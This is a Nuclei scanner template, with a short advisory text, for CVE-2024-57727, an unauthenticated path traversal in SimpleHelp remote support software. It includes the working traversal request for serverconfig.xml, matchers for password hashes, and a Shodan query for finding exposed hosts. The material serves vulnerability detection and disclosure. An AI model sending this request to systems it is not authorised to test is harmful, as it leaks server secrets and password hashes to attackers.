SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
PoC代码[已公开]
id: CVE-2024-57727
info:
name: SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal
author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1
severity: high
description: |
SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
reference:
- https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier
- https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-57727
cwe-id: CWE-22
epss-score: 0.93845
epss-percentile: 0.99854
cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: simple-help
product: simplehelp
shodan-query: html:"SimpleHelp"
tags: cvec,cve2024,simplehelp,lfi,kev,vkev,vuln
http:
- raw:
- |
GET /toolbox-resource/../serverconfig.xml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<SimpleSuite'
- '<HashPassword>'
condition: and
- type: word
part: content_type
words:
- 'application/octet-stream'
# digest: 490a004630440220134ca7b215c41ee191b953d32854b99ca45bbe5818f89541718d7f709a1ba66902205d624722c79a52e759636825ad61c2b7e4e31508a0eecbdbe414ac432503e979:922c64590222798bb761d5b6d8e72950